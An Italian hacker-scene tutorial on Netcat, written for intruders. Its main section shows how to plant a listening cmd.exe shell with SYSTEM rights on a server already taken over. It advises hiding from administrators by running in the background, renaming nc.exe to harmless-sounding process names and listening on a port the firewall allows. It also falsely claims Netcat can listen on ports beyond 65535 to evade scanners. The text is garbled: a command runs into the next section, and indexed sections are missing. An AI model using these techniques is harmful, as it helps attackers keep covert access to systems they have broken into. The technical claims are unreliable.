INDICE
|
|
----|--DISCLAIMER
|
|--BREVE INTRODUZIONE
|
|--CHE COSA E'?
|
|--COME STABILIRE UNA CONNESSIONE?
|
|--COME INVIARE DEI FILE?
|
|--COME UTILIZZO NC PER FARE DEL BUON PORT-SCANNING?
|
|--TABELLA DEI COMANDI
|
|--APPLICAZIONI: SHELL E SHELL CAMOUFLAGE
|
|--CRYPTCAT...E QUESTO COSE'?
|
|--TNX
*********************************
DISCLAIMER *
*********************************
Questa mini guida sull'utilizzo di NetCat è da considerarsi come un testo
informativo/educativo. Non sono un Guru, sono un essere umano e potrei scrivere
cazzate, quindi se ho sbagliato qualcosa scrivetemi pure e correggerò l'errore
(...magari senza insultarmi... :-) ). L'autore (Nephilim) non si assume alcuna
responsabilità per l'uso inadeguato o illegale delle informazioni qui contenute.
Ho realizzato questa guida per far capire alcuni aspetti della sicurezza non per
far divertire un paio di lamer.
Insomma se vi fate beccare per queste menate sono tutti cazzi vostri. :-)
***********************************
BREVE INTRODUZIONE *
***********************************
Questo breve tutorial riguarda l'utilizzo di un programma che riveste sicuramente un
ruolo molto importante nei processi di scambio dati e collegamento tra sistemi. In
esso saranno presenti alcune informazioni tratte dal readme dello stesso Hobbit (il
creatore di Netcat). Ricordo che Netcat esiste sia in versione UNIX che in Windows.
*******************************
CHE COSA E'? *
*******************************
Netcat è un programma in grado di leggere e scrivere dati attraverso le connessioni
TCP e UDP.
Le sue principali potenzialità sono:
Connessioni I/O TCP o UDP, per e da qualsiasi porta.
DNS forward/reverse checking.
Capacità di port-scanning, con randomizer.
Capacità di source-routing.
Slow-send mode, ovvero invio di una linea ogni N secondi.
Possibilità di legarsi ad un'altro programma per fargli sfruttare la
connessione.<---MOLTO UTILE
Script backends.
File transfers.
Server testing.
Firewall testing.
Proxy gatewaying.
Network performance testing.
Address spoofing tests.
Come avete potuto notare le potenzialità sono molte e vedremo come sfruttarne almeno
una parte.
************************************
COME STABILIRE UNA CONNESSIONE? *
************************************
Poniamo di voler mettere in comunicazione due sistemi. Le operazioni da svolgere
sono molto semplici. Sul server basta scrivere il seguente comando (prima farò
degli esempi per poi presentarvi una tabella che semplifichi le cose...):
nc -l -p2702 -d -e cmd.exe -L
Con questo comando diciamo a netcat di entrare in listen mode, sfruttando la porta
2702 e avviando il programma cmd.exe non appena la connessione viene attivata. Con
-L si comanda inoltre di riavviare netcat con la stessa linea di comando quando
la connessione termina. (Dopo capirete meglio)
Sul sistema client scriviamo:
nc bersaglio 2702
Con il quale faremo connettere netcat al bersaglio nella sua porta 2702.
Ok, se tutto andra bene avremo a disposizione una console di connessione sul server
di destinazione dalla quale potremo uscire digitando:
exit
A questo punto la connessione terminerà ma saremo in grado di riconnetterci al server
in quanto prima abbiamo digitato il comando -L che ha riavviato il listening.
*****************************************
COME INVIARE DEI FILE? *
*****************************************
Semplice...per non dire banale...vi renderete presto conto che NC è altamente
versatile ma anche intuitivo e semplice da utilizzare. :)
Sul server scriviamo:
nc -l -p 2702 >filename
Sul client che invia il file:
nc bersaglio 2702 Vogliamo una bella shell? Procuriamocela!
Una volta preso il controllo di un server (ma anche del + stupido dei privati) è
possibile fare in modo che si avvii un batch con questo comando:
nc -l -d -p 23 -t -L -e cmd.exe
Et Voilà! ad ogni connessione al nostro bersaglio avremo una shell spawnata (Bella
parola...x i newbies: generata) per le nostre connessioni telnet...e
tutto in maniera anonima (sempre che prima non abbiate fatto ca**ate! :-) ).
Ricordo che avremo i permessi NT AUTHORITY\SYSTEM.
--->Siamo visbili?
L'opzione -d permette ad nc di lavorare in background e questo significa che non
lo troveremo nemmeno sulla lista delle task in esecuzione (premendo CTRL+ALT+CANC,
per intenderci) per una buona mimetizzazione. Nonostante questo l'invisibilità non
esiste e se qualcuno verificasse le porte vedrebbe la connessione...
ma anche a questo c'è una soluzione...he he...:-)
--->C'è un firewall? Aggiriamolo!
Come ho detto prima netcat permette di aprire QUALSIASI porta..un breve scan
delle porte legittimate ad aprirsi (perchè no! magari usando ancora netcat)
e metteremo in listening la porta desiderata. A quel punto ci connetteremo e il
gioco sarà fatto.
--->Usiamo la testa!
Chiaramente sarebbe il caso di rinonimare nc.exe al fine di non insospettire
il bersaglio. Inoltre netcat viene presentato con il codice sorgente e questo
significa che è possibile personalizzare NC a propria discrezione al fine di renderlo
il più possibile aderente alle proprie necessità. Il C è come al solito d'obbligo.
--->Usiamola ancora meglio!
Tutti sappiamo che le porte su cui si può lavorare sono 65535...molte meno
persone sanno però che 65535 è un numero assegnato dalla IANA e di conseguenza
altamente modificabile. Vediamo di capire bene questa cosa: Poniamo di essere
riusciti ad entrare in un sistema, il nostro Admin (che da questo momento
in poi chiameremo pippo, Yuk! ) però nota qualcosa di strano o semplicemente fa
un controllo...prende il suo bel port-scanner ed analizza il sistema...già,
ma solo nel range di porte 1-65535! Se io dico a netcat di entrare in
listening sulla porta 270280 o semplicemente -1 il mio attento NMAP non
troverà proprio nulla! Sembra strano ma vi assicuro che Netcat lo permette
e poi rimarrà in attesa di vostri ordini o connessioni! MITICO!
Ok, pochi entusiami...:)
Non sottovalutiamo gli admin, talvolta sono più furbi di quello che sembrano...
poniamo che il nostro pippo sia ancora sospettoso e che voglia analizzare
tutti i processi in esecuzione. Sarebbe meglio fargli trovare quello che si aspetta
di trovare e di conseguenza utilizzate nomi credibili come ipscan.exe,
iflog.exe , spool.exe (evitate nomi come tistofottendolashell.exe...tendono a
beccarvi...:-) Beh, sicuramente non sarà una shell eterna ma vi assicuro che durerà
molto ma molto tempo!
****************************************************
CRYPTCAT...E QUESTO COSE'? *
****************************************************
Ho voluto inserire uno dei diretti discendenti di netcat, Cryptcat appunto, in
quanto in termini di sicurezza presenta un grosso miglioramento. E' stato infatti
inserito l'algoritmo di criptazione Twofish di Bruce Schneier. Molto utile per
lo sniffing del traffico netcat!
****************************************************
TNX *
****************************************************
Ok, anche questa è fatta...vi consiglio di avvicinarvi a questo proggy perchè
è veramente utile.
CIAO...
...aspettate...questa volta faccio i saluti: :-)
Melanie (ti adoro), Saso (Se mi passi gli appunti di analogica adorerò anche te),
l'allegra ciurmaglia di Napoli Hak (Team, Collaboratori, parrucchieri,
buttafuori e passanti), Z3liaK, Stormnet, Cyb3r Attack, Subex, SaRiCa,
Leila, J.Romeno, WW, Onda Quadra, Little Tatu, tutti quelli che mi sono
dimenticato di inserire ma soprattutto tutta la selvaggia Acid-def Crew.
We work in the dark
We do what we can
We give what we have
Our doubt is our passion, and our passion is our task
The rest is the madness of art.
-- Henry James
--
-=|Nephilim|=-
Acid-def Crew Member
stocastica@katamail.com